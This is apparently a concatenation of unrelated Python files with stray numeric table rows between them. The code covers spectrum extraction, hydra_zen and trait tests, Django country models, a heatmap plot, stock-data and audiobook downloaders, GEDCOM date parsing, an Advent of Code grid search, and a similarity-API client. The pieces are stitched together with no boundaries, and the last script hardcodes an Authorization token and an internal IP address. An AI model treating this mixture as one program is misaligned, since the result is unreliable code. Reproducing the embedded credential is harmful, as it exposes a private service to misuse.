        # was being called with the column (pix0) as the starting row
        tr.trace(hd,sr,sc0=pix0)
        alltr.append(tr)
    return alltr
def extract(hd,apertures) :
    """ Do all extractions

        Runs extract() on each aperture trace and stacks the resulting
        1D spectra into a single 2D array (one row per aperture).
    """
    ncol = hd.data.shape[1]
    spec = np.zeros([len(apertures), ncol])
    for idx, aperture in enumerate(apertures):
        print('extracting aperture {:d}'.format(idx), end='\r')
        spec[idx] = aperture.extract(hd)
    return spec
| 36,064 | 12,541 |
# Copyright (c) 2022 Massachusetts Institute of Technology
# SPDX-License-Identifier: MIT
from dataclasses import is_dataclass
import pytest
from hydra_zen import hydrated_dataclass, instantiate
def f1(x, y):
    """Two-argument stub target for config tests; always returns None."""
    return None
def f2(x, y, z):
    """Three-argument target; echoes its arguments back as a tuple."""
    return (x, y, z)
@pytest.mark.parametrize("conf2_sig", [True, False])
@pytest.mark.parametrize("conf3_sig", [True, False])
def test_chained_inheritance(conf2_sig, conf3_sig):
    """Verify hydrated_dataclass configs chain through inheritance.

    Conf1 -> Conf2 -> Conf3 each add one field; regardless of whether the
    intermediate configs populate their full signature, the leaf config
    must see all inherited defaults and instantiate f2 with (1, 2, 3).
    """
    @hydrated_dataclass(f1)
    class Conf1:
        x: int = 1
    @hydrated_dataclass(f1, populate_full_signature=conf2_sig)
    class Conf2(Conf1):
        y: int = 2
    @hydrated_dataclass(f2, populate_full_signature=True)
    class Conf3(Conf2):
        z: int = 3
    # each decorated config must still be a real dataclass
    assert is_dataclass(Conf1)
    assert is_dataclass(Conf2)
    assert is_dataclass(Conf3)
    # inheritance chain is preserved by the decorator
    assert issubclass(Conf2, Conf1)
    assert issubclass(Conf3, Conf1)
    assert issubclass(Conf3, Conf2)
    # instantiating the leaf config calls f2 with all inherited fields
    assert instantiate(Conf3) == (1, 2, 3)
def test_pos_args():
    """Positional args given to hydrated_dataclass are forwarded to the target.

    x and y are bound positionally at decoration time; only z comes from
    the config fields.
    """
    @hydrated_dataclass(f2, 1, 2)
    class Conf:
        z: int = 3
    assert instantiate(Conf) == (1, 2, 3)
| 1,075 | 430 |
# Prints a fixed greeting -- submitted as a trivially easy ("free point")
# Kattis problem. The author's first attempt hit a compiler error because
# they were new to Python 3 at the time.
greeting = "Hello World!"
print(greeting)
from django.db import models
from forex.models import Currency
class Country(models.Model):
    """
    Represents a country, such as the US, or Mexico.

    Carries the ISO 3166-1 identity (alpha-2/alpha-3 symbols, numeric
    code, assignment status) plus convenience naming fields used for
    text autogeneration.
    """
    name = models.CharField(max_length=255, blank=True, null=True, help_text="Official Country name (ISO Full name)")
    currency = models.ManyToManyField(Currency, help_text="Official currencies for this country. More than one currency is possible")
    symbol_alpha2_code = models.CharField(help_text="ISO 3166-1 alpha-2 symbol", max_length=2, unique=True)
    symbol_alpha3_code = models.CharField(help_text="ISO 3166-1 alpha-3 symbol", max_length=3, unique=True)
    is_independent = models.BooleanField()
    # ISO 3166-1 numeric code
    numeric_code = models.PositiveSmallIntegerField()
    remark_1 = models.TextField(blank=True)
    remark_2 = models.TextField(blank=True)
    remark_3 = models.TextField(blank=True)
    territory_name = models.TextField(blank=True)
    # ISO 3166-1 code-assignment status values
    ISO_STATUS_CHOICES = (
        (u'EXR', u'Exceptionally reserved'),
        (u'FRU', u'Formerly used'),
        (u'INR', u'Indeterminately reserved'),
        (u'OFF', u'Officially assigned'),
        (u'TRR', u'Transitionally reserved'),
        (u'UND', u'Unassigned'),
    )
    iso_status = models.CharField(max_length=3, choices=ISO_STATUS_CHOICES, default="UND")
    # Additional helpful fields
    common_name = models.CharField(max_length=255, unique=True, help_text="Common Country name")
    in_name = models.CharField(max_length=255, help_text="The name of the country after the word 'in'. Useful for Autogeneration.")
    class Meta:
        verbose_name_plural = 'Countries'
        verbose_name = 'Country'
        ordering = ['name', ]
    # Python 2 display method (uses the py2-only `unicode` builtin)
    def __unicode__(self):
        return u'%s' % (unicode(self.common_name))
class Region(models.Model):
    """
    Represents a region, such as the Latin America, or Europe.

    A named grouping of countries with a short symbol.
    """
    name = models.CharField(max_length=255, unique=True)
    country = models.ManyToManyField(Country)
    symbol = models.CharField(max_length=4)
    class Meta:
        verbose_name_plural = 'Regions'
        verbose_name = 'Region'
        ordering = ['name', ]
    # Python 2 display method (uses the py2-only `unicode` builtin)
    def __unicode__(self):
        return u'%s' % (unicode(self.name))
class City(models.Model):
    """
    Represents a city within a country

    City names are unique per country (see unique_together), not globally.
    """
    name = models.CharField(max_length=255)
    symbol = models.CharField(max_length=255, blank=True)
    country = models.ForeignKey(Country)
    class Meta:
        verbose_name_plural = 'Cities'
        verbose_name = 'City'
        ordering = ['name', ]
        unique_together = (("name", "country"), )
    # Python 2 display method, e.g. u'Paris, France'
    def __unicode__(self):
        return u'%s, %s' % (unicode(self.name), unicode(self.country.name))
class Government(models.Model):
    """
    Represents a government of a country, such as the
    'Government of Australia'.

    Government names are unique per country (see unique_together).
    """
    name = models.CharField(max_length=255)
    country = models.ForeignKey(Country)
    class Meta:
        verbose_name_plural = 'Governments'
        verbose_name = 'Government'
        ordering = ['name', ]
        unique_together = (("name", "country"), )
    # Python 2 display method (uses the py2-only `unicode` builtin)
    def __unicode__(self):
        return u'%s' % (unicode(self.name))
| 3,165 | 1,019 |
import argparse
from pathlib import Path
import json
import seaborn as sns
import matplotlib.pyplot as plt
from matplotlib import rcParams
def main(input_file: Path, output_file: Path) -> None:
    """Render a heatmap from a processed JSON payload and save it to disk.

    The JSON is expected to provide 'x', 'y' (axis labels) and 'z' (the
    2D value matrix) -- presumably produced by process.py; verify there.
    """
    with input_file.open('r') as handle:
        payload = json.load(handle)
    plt.figure(figsize=(20, 13))
    rcParams['font.family'] = 'serif'
    rcParams['font.serif'] = 'Times New Roman'
    plt.tick_params(left=False, bottom=False)
    # rows (and y labels) are reversed so the y axis reads bottom-up
    sns.heatmap(payload['z'][::-1], xticklabels=payload['x'], yticklabels=payload['y'][::-1], cmap='mako_r')  # YlGnBu_r, mako_r
    plt.savefig(output_file, bbox_inches='tight', dpi=150)
if __name__ == '__main__':
    # CLI entry point: input JSON path and output figure path
    arg_parser = argparse.ArgumentParser()
    arg_parser.add_argument('input', type=Path, help='Input JSON file, generated by process.py')
    arg_parser.add_argument('output', type=Path, help='Output file containing the figure')
    parsed = arg_parser.parse_args()
    main(parsed.input, parsed.output)
| 920 | 331 |
from ptrait import TraitExtends
import copy
from pytest_assertutil import assert_equal
class IntfA:
    """Trait interface A: methods marked for cascading onto consumer classes.

    Each method deep-copies kwargs and bumps 'a' by a fixed amount so tests
    can tell which trait implementation actually ran (A adds 1, the shared
    *C methods add 3).
    """
    @classmethod
    @TraitExtends.mark
    def a_classmethodA(cls, *args, **kwargs):
        # return inputs with kwargs['a'] incremented by 1 (A's signature)
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 1
        return args, kwa
    @classmethod
    @TraitExtends.mark
    def a_classmethodC(cls, *args, **kwargs):
        # shared-name method: increments by 3
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 3
        return args, kwa
    @staticmethod
    @TraitExtends.mark
    def a_staticmethodA(*args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 1
        return args, kwa
    @staticmethod
    @TraitExtends.mark
    def a_staticmethodC(*args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 3
        return args, kwa
    @TraitExtends.mark
    def a_instancemethodA(self, *args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 1
        return args, kwa
    @TraitExtends.mark
    def a_instancemethodC(self, *args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 3
        return args, kwa
class IntfB:
    """Trait interface B: same shape as IntfA but its own methods add 2.

    The *C methods duplicate IntfA's so the cascade's conflict/override
    behavior for identically named members can be exercised.
    """
    @classmethod
    @TraitExtends.mark
    def a_classmethodB(cls, *args, **kwargs):
        # return inputs with kwargs['a'] incremented by 2 (B's signature)
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 2
        return args, kwa
    @classmethod
    @TraitExtends.mark
    def a_classmethodC(cls, *args, **kwargs):
        # shared-name method: increments by 3 (same as IntfA's)
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 3
        return args, kwa
    @staticmethod
    @TraitExtends.mark
    def a_staticmethodB(*args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 2
        return args, kwa
    @staticmethod
    @TraitExtends.mark
    def a_staticmethodC(*args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 3
        return args, kwa
    @TraitExtends.mark
    def a_instancemethodB(self, *args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 2
        return args, kwa
    @TraitExtends.mark
    def a_instancemethodC(self, *args, **kwargs):
        kwa = copy.deepcopy(kwargs)
        kwa['a'] = kwargs.get('a', 0) + 3
        return args, kwa
@TraitExtends.cascade(IntfA, IntfB)
class A:
    """Empty consumer class: all members come from the cascaded traits."""
    pass
def test_cascade_call_instanceA():
    """IntfA's instance method must be callable on A and add 1 to 'a'."""
    expected = ((), {'a': 1})
    assert_equal(expected, A().a_instancemethodA())
def test_cascade_call_instanceB():
    """IntfB's instance method must be callable on A and add 2 to 'a'."""
    expected = ((), {'a': 2})
    assert_equal(expected, A().a_instancemethodB())
def test_cascade_call_instanceC():
    """The shared-name instance method must resolve and add 3 to 'a'."""
    expected = ((), {'a': 3})
    assert_equal(expected, A().a_instancemethodC())
def test_cascade_call_staticmethodA():
    """IntfA's static method must be callable on A itself and add 1."""
    expected = ((), {'a': 1})
    assert_equal(expected, A.a_staticmethodA())
def test_cascade_call_staticmethodB():
    """IntfB's static method must be callable on A itself and add 2."""
    expected = ((), {'a': 2})
    assert_equal(expected, A.a_staticmethodB())
def test_cascade_call_staticmethodC():
    """The shared-name static method must resolve and add 3."""
    expected = ((), {'a': 3})
    assert_equal(expected, A.a_staticmethodC())
def test_cascade_call_classmethodA():
    """IntfA's classmethod must be callable on A and add 1."""
    expected = ((), {'a': 1})
    assert_equal(expected, A.a_classmethodA())
def test_cascade_call_classmethodB():
    """IntfB's classmethod must be callable on A and add 2."""
    expected = ((), {'a': 2})
    assert_equal(expected, A.a_classmethodB())
def test_cascade_call_classmethodC():
    """The shared-name classmethod must resolve and add 3."""
    expected = ((), {'a': 3})
    assert_equal(expected, A.a_classmethodC())
| 3,436 | 1,307 |
import yahoo_fin.stock_info as si
import pandas as pd
import os
def download_data(etfs, time_frames):
    """Download historical price data for each ticker/interval and save CSVs.

    Parameters
    ----------
    etfs : iterable of ticker symbols accepted by yahoo_fin
    time_frames : iterable of yahoo_fin intervals ('1d', '1wk', '1mo', ...)

    Files are written to ./Data/rawdata/<ticker>_<daily|weekly|monthly>.csv.
    """
    # ensure output directory exists (bug fix: files were previously written
    # to './data/rawdata' while only './Data/rawdata' was created, which
    # fails on case-sensitive filesystems)
    os.makedirs('./Data/rawdata', exist_ok=True)
    interval_names = {'1d': 'daily', '1wk': 'weekly'}
    for ticker in etfs:
        for interval in time_frames:
            print("This is a ticker ", ticker, interval)
            historical_price = si.get_data(ticker, interval=interval)
            # delete column 'ticker'
            historical_price = historical_price.drop(["ticker"], axis=1)
            # use date as index of the dataframe
            historical_price.index.name = "date"
            # Drop rows with missing values if any exist; otherwise drop the
            # last row (which may be a partial/in-progress period).
            # (bug fix: this comment was previously mojibake split across two
            # lines, leaving an uncommented garbage line -- a SyntaxError)
            if historical_price.isnull().any().sum() > 0:
                historical_price.dropna(how='any', inplace=True)
            else:
                historical_price = historical_price.iloc[:-1]
            # save file; any other interval is labelled 'monthly' as before
            label = interval_names.get(interval, 'monthly')
            historical_price.to_csv("./Data/rawdata/" + ticker + "_" + label + ".csv")
import datetime
import re
import os
import logging
import json
# Month abbreviations as used by GEDCOM DATE values (index + 1 = month number)
_months = [
    "JAN", "FEB", "MAR", "APR", "MAY", "JUN",
    "JUL", "AUG", "SEP", "OCT", "NOV", "DEC"
]
# GEDCOM date qualifiers (about / calculated / estimated / after / before)
_precision = [
    'ABT',
    'CAL',
    'EST',
    'AFT',
    'BEF'
]
# "QUAL? day? month? year" single-date form
_date_expr = re.compile('(?:(' + '|'.join(_precision) + ') )?(?:(\\d+) )?(?:(' + '|'.join(_months) + ') )?(\\d{4})')
# "BET date AND date" interval form
_interval_expr = re.compile('(BET) (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4}) AND (?:(\\d+) (' + '|'.join(_months) + ') )?(\\d{4})')
# maximum day per month (29 for February; clamped to 28 in non-leap years below)
_max_days = {
    1:31,
    2:29,
    3:31,
    4:30,
    5:31,
    6:30,
    7:31,
    8:31,
    9:30,
    10:31,
    11:30,
    12:31
}
def get_date_dict_from_tag(parent_item, tag_name):
    """
    Read the date from a gedcom tag

    Args:
        parent_item (dict): parent event node containing tag_name
        tag_name (str): event type (e.g. 'BIRT', 'DEAT', 'BURI')

    Returns:
        dict with keys tag_name/date/ordinal_value/ordinal_value_min/
        ordinal_value_max/comment/precision, or None if the tag is absent
        or the date cannot be parsed.
    """
    try:
        if tag_name not in parent_item:
            return None
        if 'DATE' not in parent_item[tag_name]:
            return None
        comment = None
        precision = ''
        content = parent_item[tag_name]['DATE']['tag_data']
        date_info = _date_expr.match(content)
        if date_info is None:
            date_info = _interval_expr.match(content)
        # map the qualifier to a human-readable comment
        if date_info.group(1) == 'EST':
            comment = 'Estimated'
        elif date_info.group(1) == 'ABT':
            comment = 'About'
        elif date_info.group(1) == 'CAL':
            comment = 'Calculated'
        elif date_info.group(1) == 'AFT':
            comment = 'After'
        elif date_info.group(1) == 'BEF':
            comment = 'Before'
        elif date_info.group(1) == 'BET':
            comment = 'Between'
        elif date_info.group(2) is None and date_info.group(3) is None and date_info.group(4) is not None:
            comment = 'YearPrecision'
        # fallbacks used when a component is missing: full-year span
        month_max_, day_max_ = 12, 31
        month_min_, day_min_ = 1, 1
        year_min, year_max = None, None
        month_max, day_max = None, None
        month_min, day_min = None, None
        if date_info.group(1) == 'BET':
            # interval form: groups 5-7 hold the second date
            if date_info.group(7):
                year_max = int(date_info.group(7))
            if date_info.group(6):
                month_max = _months.index(date_info.group(6)) + 1
            if date_info.group(5):
                day_max = int(date_info.group(5))
        if date_info.group(4):
            year_min = int(date_info.group(4))
            if not year_max:
                year_max = year_min
            precision = 'y' + precision
        if date_info.group(3):
            month_min = _months.index(date_info.group(3)) + 1
            if not month_max:
                month_max = month_min
            precision = 'm' + precision
        if date_info.group(2):
            day_min = int(date_info.group(2))
            if not day_max:
                day_max = day_min
            precision = 'd' + precision
        # open-ended qualifiers get an arbitrary 15-year window
        if date_info.group(1) == 'AFT':
            year_max = year_min + 15
        elif date_info.group(1) == 'BEF':
            year_min = year_max - 15
        if not month_max: month_max = month_max_
        if not month_min: month_min = month_min_
        if not day_max: day_max = day_max_
        if not day_min: day_min = day_min_
        day_max = min(_max_days[month_max], day_max)
        # bug fix: February 29 in a non-leap year previously retried the
        # identical failing datetime() call and silently returned None;
        # clamp to the 28th instead
        if month_max == 2 and day_max == 29 and not (
                year_max % 4 == 0 and (year_max % 100 != 0 or year_max % 400 == 0)):
            day_max = 28
        date_min = datetime.datetime(year_min, month_min, day_min, 0, 0, 0, 0)
        date_max = datetime.datetime(year_max, month_max, day_max, 0, 0, 0, 0)
        if tag_name in ['BURI', 'DEAT']:
            # if unknown move to the end of the year
            date = date_max
        else:
            # if unknown move to the beginning of the year
            date = date_min
        return {
            'tag_name': tag_name,
            'date': date,
            'ordinal_value': date.toordinal(),
            'ordinal_value_max': date_max.toordinal(),
            'ordinal_value_min': date_min.toordinal(),
            'comment': comment,
            'precision' : precision
        }
    except Exception:
        # unparsable date content: signal failure with None
        return None
def _get_relevant_events(database_indi, individual_id, target):
    """Collect vital-event dates for one individual into `target`.

    Args:
        database_indi (dict): individual records keyed by id
        individual_id: key of the individual to read
        target (dict): output mapping; receives 'birth', 'christening',
            'baptism', 'death', 'burial' (when present and parsable) plus
            the derived 'birth_or_christening' / 'death_or_burial' keys.
    """
    record = database_indi[individual_id]
    # one fetch per supported event tag; drop entries whose date failed to
    # parse (get_date_dict_from_tag returns None on failure)
    for key, tag in (('birth', 'BIRT'), ('christening', 'CHR'),
                     ('baptism', 'BAPM'), ('death', 'DEAT'),
                     ('burial', 'BURI')):
        if record.get(tag):
            target[key] = get_date_dict_from_tag(record, tag)
            if target[key] is None:
                target.pop(key)
    # derived key: birth wins, then christening, then baptism
    # (note: the final else clobbers any pre-existing value with None,
    # matching the original behavior)
    if 'birth' in target:
        target['birth_or_christening'] = target['birth']
    elif 'birth_or_christening' not in target and 'christening' in target:
        target['birth_or_christening'] = target['christening']
    elif 'birth_or_christening' not in target and 'baptism' in target:
        target['birth_or_christening'] = target['baptism']
    else:
        target['birth_or_christening'] = None
    # derived key: death wins, then burial
    if 'death' in target:
        target['death_or_burial'] = target['death']
    elif 'death_or_burial' not in target and 'burial' in target:
        target['death_or_burial'] = target['burial']
    else:
        target['death_or_burial'] = None
def estimate_marriage_date(family):
    """
    If the marriage date is unknown, then estimate the date by assuming:
    - the marriage took place before the first child was born
    Args:
        family (BaseFamily): family instance
    """
    if family.marriage is not None:
        return
    birth_events = []
    for child_id in family.children_individual_ids:
        events = {}
        _get_relevant_events(family._database_indi, child_id, events)
        if events['birth_or_christening']:
            birth_events.append(events['birth_or_christening'])
    if birth_events:
        # earliest child birth/christening stands in for the marriage date
        family.marriage = min(birth_events, key=lambda e: e['ordinal_value'])
| 7,220 | 2,445 |
from HTMLParser import HTMLParser
import json
from os import makedirs
from os.path import abspath, dirname, exists, join, normpath
import pycurl
import Queue
import re
import requests
import tempfile
import urllib2
class HimalayanDownloader:
    """Audio-book downloader for ximalaya.com (Python 2 code).

    Scrapes a book's track listing from its web page, resolves each
    track's media URL via the site's JSON endpoint, and downloads the
    files with pycurl, retrying failed tracks up to _maxTrial times.
    """
    def __init__(self, eBookUrl, logger):
        self._logger = logger
        self._eBookUrl = eBookUrl
        self._failedTracksQueue = None
        self._downloadQueue = Queue.Queue()
        self._completedQueue = Queue.Queue()
        self._maxTrial = 10
        self._trial = 0
        self._hp = HTMLParser()
        self._trackUrlDir = 'http://www.ximalaya.com/tracks/'
        self._bookName = self.getBookName()
    def getBookName(self):
        """Fetch the book page and return its <h1> title (':' -> '_')."""
        response = urllib2.urlopen(self._eBookUrl)
        html = response.read()
        pattern = re.compile('<h1>(.*?)</h1>', re.S)
        rawName = re.findall(pattern, html)[0].decode('utf-8')
        return self._hp.unescape(rawName).replace(':', '_')
    def download(self):
        """Download all tracks; returns the queue of completed downloads.

        Each completed entry is (tmpFilePath, bookName, fileName).
        Tracks still failing after _maxTrial retry rounds are dropped.
        """
        self._logger.info('Downloading book <<' + self._bookName + '>>')
        currPath = join(dirname(abspath(__file__)), '..')
        bookPath = normpath(join(currPath, self._bookName))
        self._logger.info('Files can be found in: ' + bookPath)
        if not exists(bookPath):
            makedirs(bookPath)
        self.fetchTracks()
        while self._trial < self._maxTrial:
            self._failedTracksQueue = Queue.Queue()
            while not self._downloadQueue.empty():
                track = self._downloadQueue.get()
                self.downloadTrack(track[0], track[1])
            if self._failedTracksQueue.empty():
                break
            else:
                self._downloadQueue = self._failedTracksQueue
                # bug fix: was `self._trail += 1` (typo), which raised
                # AttributeError on the first failed batch and aborted
                # the retry loop
                self._trial += 1
        self._logger.info('Finished downloading book <<' + self._bookName + '>>')
        return self._completedQueue
    def downloadTrack(self, url, fileName):
        """Download one track to a temp file; queue it for retry on error."""
        self._logger.info('Downloading track: ' + fileName)
        self._logger.debug('Track URL: ' + url)
        tmpFileName = url.split('/')[-1]
        tmpFilePath = normpath(join(tempfile.gettempdir(), tmpFileName))
        with open(tmpFilePath, 'wb') as f:
            c = pycurl.Curl()
            c.setopt(c.URL, url)
            c.setopt(c.WRITEDATA, f)
            try:
                c.perform()
            except pycurl.error as e:
                self._logger.error('ERROR occurred: ' + e.message)
                self._logger.debug('Adding "' + fileName + '" to re-download tasks')
                self._failedTracksQueue.put((url, fileName))
            else:
                c.close()
                self._completedQueue.put((tmpFilePath, self._bookName, fileName))
    def fetchTracks(self):
        """Walk the paginated track list and fill the download queue.

        File names are '<book>_<zero-padded index>_<track title>'.
        """
        pageNum = 1
        trackQueue = Queue.Queue()
        while True:
            pageUrl = self._eBookUrl + '?page=%d' % pageNum
            self._logger.debug('Fetching page: ' + pageUrl)
            response = urllib2.urlopen(pageUrl)
            html = response.read()
            self._logger.debug('Analyzing page: ' + pageUrl)
            pattern = re.compile('<a class="title" href="(.*?)" hashlink title="(.*?)">', re.S)
            results = re.findall(pattern, html)
            if not results:
                # an empty page means we walked past the last one
                break
            for result in results:
                trackQueue.put(result)
            pageNum += 1
        # zero-pad indices to the width of the total track count
        indexLength = len(str(trackQueue.qsize()))
        index = 0
        while not trackQueue.empty():
            index += 1
            track = trackQueue.get()
            jsonUrl = self._trackUrlDir + track[0].split('sound/')[-1] + '.json'
            self._logger.debug('Loading JSON: ' + jsonUrl)
            resp = requests.get(url=jsonUrl)
            data = json.loads(resp.text)
            fileName = self._bookName + '_' + str(index).zfill(indexLength) + '_'
            fileName += self._hp.unescape(track[1].decode('utf-8')).replace(':', '_')
            url = data['play_path']
            self._downloadQueue.put((url, fileName))
| 4,020 | 1,165 |
import re
import copy
import hashlib
class Node:
    """One storage node parsed from a df-style line of the puzzle input."""

    def __init__(self, line):
        # Example line: /dev/grid/node-x0-y0   85T   73T    12T   85%
        m = re.match(r"\/dev\/grid\/node-x(\d+)-y(\d+)\s+(\d+)T\s+(\d+)T\s+(\d+)T\s+(\d+)%", line)
        if m is None:
            # Header / non-node lines are marked invalid and skipped by callers.
            self.valid = False
            return
        self.valid = True
        self.x = int(m.group(1))
        self.y = int(m.group(2))
        self.size = int(m.group(3))
        self.used = int(m.group(4))
        self.goal = False

    def avail(self):
        """Free space on this node (Size - Used)."""
        return self.size - self.used

    def empty(self):
        return self.used == 0

    def start(self):
        """True for the origin node (0, 0) where the goal data must end up."""
        return self.x == 0 and self.y == 0

    def __str__(self):
        return "(%d, %d)" % (self.x, self.y)

    def __repr__(self):
        return self.__str__()

    def __cmp__(self, other):
        # Python 2 total ordering: by x, then y.
        c = self.x - other.x
        if c == 0:
            return self.y - other.y
        return c

    def __eq__(self, other):
        # BUG FIX: __ne__ called self.__eq__, but no __eq__ was defined, so
        # it raised AttributeError (old-style Python 2 class).  Equality is
        # by grid coordinates, consistent with __cmp__ (coordinates are
        # unique per node, so this also matches identity).
        return isinstance(other, Node) and self.x == other.x and self.y == other.y

    def __ne__(self, other):
        return not self.__eq__(other)
def part1():
with open("inputs/day22.txt") as f:
all_nodes = []
for line in f:
n = Node(line)
if n.valid:
all_nodes.append(n)
viable = []
for a in all_nodes:
for b in all_nodes:
if a == b or a.empty():
continue
if a.used < b.avail():
viable.append((a, b))
print "Part1:", len(viable)
class Grid:
    """Sparse grid of Node objects keyed by str(node), i.e. "(x, y)".

    Tracks which node currently holds the goal data (the highest-x node on
    row y == 0) and which single node is empty; BFS moves slide data from a
    neighbour into the empty node.
    """
    def __init__(self, filename):
        # filename: puzzle input path; non-node lines are skipped via Node.valid.
        self.grid = {}
        # Node currently holding the goal data.
        self.goal = None
        # The single node with used == 0.
        self.emptyNode = None
        self.steps = 0
        with open(filename) as f:
            for line in f:
                n = Node(line)
                if n.valid:
                    self.grid[str(n)] = n
                    # The goal data starts on the highest-x node of row y == 0:
                    # adopt the first node seen, then replace whenever a
                    # further-right node on row 0 appears.
                    if (self.goal is None):
                        n.goal = True
                        self.goal = n
                    elif (n.y == 0) and n.x > self.goal.x:
                        self.goal.goal = False
                        n.goal = True
                        self.goal = n
                    if n.empty():
                        self.emptyNode = n
    def getHome(self):
        # The destination node (0, 0) that the goal data must reach.
        return self.get("(0, 0)")
    def get(self, s):
        # s: an "(x, y)" key; returns None when no such node exists.
        return self.grid.get(s, None)
    def set(self, s, val):
        self.grid[s] = val
    def __str__(self):
        return str(self.grid)
    def __repr__(self):
        return self.__str__()
    def hash(self):
        # Digest of every node's (x, y, size, used), used by the BFS to
        # detect duplicate states.  NOTE(review): relies on dict iteration
        # order being identical for equivalent grids within one process --
        # holds here because all grids are deep copies of one original.
        m = hashlib.md5()
        for key in self.grid:
            node = self.grid[key]
            m.update("(%d,%d,%d,%d)" % (node.x, node.y, node.size, node.used))
        return m.digest()
    def draw(self):
        # ASCII dump of the grid: G = goal data, _ = empty node, . = other
        # data; (c) parenthesizes the home node (0, 0).  Python 2 prints.
        print "######################\n"
        y = 0
        # `broken` counts consecutive cell misses; it reaches 2 only when a
        # whole row is absent (miss at end of previous row + miss at x == 0),
        # which means we have scanned past the last row.
        broken = 0
        while True:
            x = 0
            while True:
                n = self.get("(%d, %d)" % (x, y))
                if n is not None:
                    broken = 0
                    c = None
                    if n.goal:
                        c = "G"
                    elif n.empty():
                        c = "_"
                    else:
                        c = "."
                    if n.start():
                        print "(%s)" % c,
                    else:
                        print " %s " % c,
                else:
                    broken += 1
                    print ""
                    break
                x += 1
            if broken == 2:
                break
            y += 1
        print "######################"
def bfs(grid_list, steps=0, duplicates=[]):
if len(grid_list) == 0:
return -1
print "========================================="
print "BFS(%d): %d" % (steps, len(grid_list))
next_grids = []
for baseGrid in grid_list:
homeNode = baseGrid.getHome()
if homeNode.empty() and (baseGrid.get("(1, 0)").goal or baseGrid.get("(0, 1)").goal):
return steps+1
for (x, y) in [(-1, 0), (1, 0), (0, -1), (0, 1)]:
grid = copy.deepcopy(baseGrid)
empty = grid.emptyNode
nxt_str = "(%d, %d)" % (empty.x+x, empty.y+y)
nxt = grid.get(nxt_str)
if (nxt is not None) and (empty.size >= nxt.used):
empty.used = nxt.used
nxt.used = 0
if nxt.goal:
nxt.goal = False
empty.goal = True
grid.emptyNode = nxt
hsh = grid.hash()
if hsh not in duplicates:
duplicates.append(hsh)
next_grids.append(grid)
return bfs(next_grids, steps+1, duplicates)
def part2():
# this solution works for the sample data, but takes *forever* on the given data
# ended up using https://codepen.io/anon/pen/BQEZzK to come up with the final anser
grid = Grid("inputs/test.txt")
print "shortest: %d" % bfs([grid])
#grid.draw()
#part1()
part2() | 4,962 | 1,557 |
__author__ = 'wasi'
from .summary import *
from .code import *
| 64 | 23 |
from collections import defaultdict
from prometheus.utils.misc import FrozenClass
class RunnerState(FrozenClass):
    """
    An object that is used to pass internal state during train/valid/infer.
    """

    def __init__(self, **kwargs):
        # Set every known field to its default, apply keyword overrides,
        # then freeze the instance (FrozenClass presumably forbids adding
        # new attributes after _freeze() -- TODO confirm against the
        # FrozenClass implementation).
        # data
        self.device = None       # assumed: torch device for the run -- TODO confirm
        self.input = None        # current batch input
        self.output = None       # model output for the current batch
        self.loader = None       # active data loader
        self.loader_mode = None  # presumably "train"/"valid"/"infer"; verify against caller
        # counters
        self.bs = 0              # batch size
        self.step = 0            # global step counter
        self.epoch = 0           # current epoch index
        # metrics
        self.lr = defaultdict(lambda: 0)        # per-key learning rates; missing keys read as 0
        self.momentum = defaultdict(lambda: 0)  # per-key momentum values; missing keys read as 0
        self.loss = None
        self.epoch_metrics = None
        self.best_metrics = None
        # other
        self.is_train = False
        # Keyword arguments override any of the defaults above.
        for k, v in kwargs.items():
            setattr(self, k, v)
        self._freeze()
| 820 | 251 |
#-*- coding: utf-8 -*-
import requests
import numpy as np
import json
import concurrent.futures
import codecs
# Load the two query/candidate text pairs used as request payloads.
# BUG FIX: the second pair of files was read back into input1/candidate1,
# silently overwriting the first pair before post_data_1 was built; each
# pair now keeps its own variables.
with codecs.open('./test_1.txt', 'r', 'utf-8') as frobj:
    input1 = frobj.read().strip()
with codecs.open('./candidate_1.txt', 'r', 'utf-8') as frobj:
    candidate1 = frobj.read().strip()
with codecs.open('./test_2.txt', 'r', 'utf-8') as frobj:
    input2 = frobj.read().strip()
with codecs.open('./candidate_2.txt', 'r', 'utf-8') as frobj:
    candidate2 = frobj.read().strip()

post_data_1 = {
    "data": {
        "query": input1,
        "candidate": [candidate1]
    }
}
# Second payload, built symmetrically from the second file pair.
post_data_2 = {
    "data": {
        "query": input2,
        "candidate": [candidate2]
    }
}
def create_http_session(config):
    """Build a requests.Session with a retrying, pooled HTTP adapter.

    config keys (all optional): "max_retries" (default 3),
    "pool_connections" (default 100), "pool_maxsize" (default 100).
    """
    adapter = requests.adapters.HTTPAdapter(
        max_retries=config.get("max_retries", 3),
        pool_connections=config.get("pool_connections", 100),
        pool_maxsize=config.get("pool_maxsize", 100))
    http_session = requests.Session()
    http_session.mount('http://', adapter)
    return http_session
# Module-level HTTP session with default retry and connection pooling.
session = create_http_session({})
def infer_data(input_data=None):
    """POST a similarity query to the prediction service.

    input_data: payload dict; defaults to the module-level post_data_1.
    Returns the raw response body (bytes).
    """
    if input_data is None:
        # BUG FIX: the original body referenced an undefined global
        # `input_data`, raising NameError on every call.
        input_data = post_data_1
    headers = {}
    headers["Authorization"] = "ZWE5Y2FmNTgxMjA2NzdmOTJlOTEyMTllNmFkMTI4MDg4ZDk5OGMzYQ=="
    # BUG FIX: the headers were built but never sent, and the pooled
    # module-level session was created but never used; both now apply.
    response = session.post(
        "http://11.31.153.212:58756/api/predict/pi_text_similarity_match_v1_bj_90ebb4d6",
        data=json.dumps(input_data),
        headers=headers)
    results = (response.content)
    return results
# BUG FIX: the original called undefined `infer(...)` (NameError); the
# request helper defined above is `infer_data`.
resp = infer_data()
print(resp)
| 1,262 | 564 |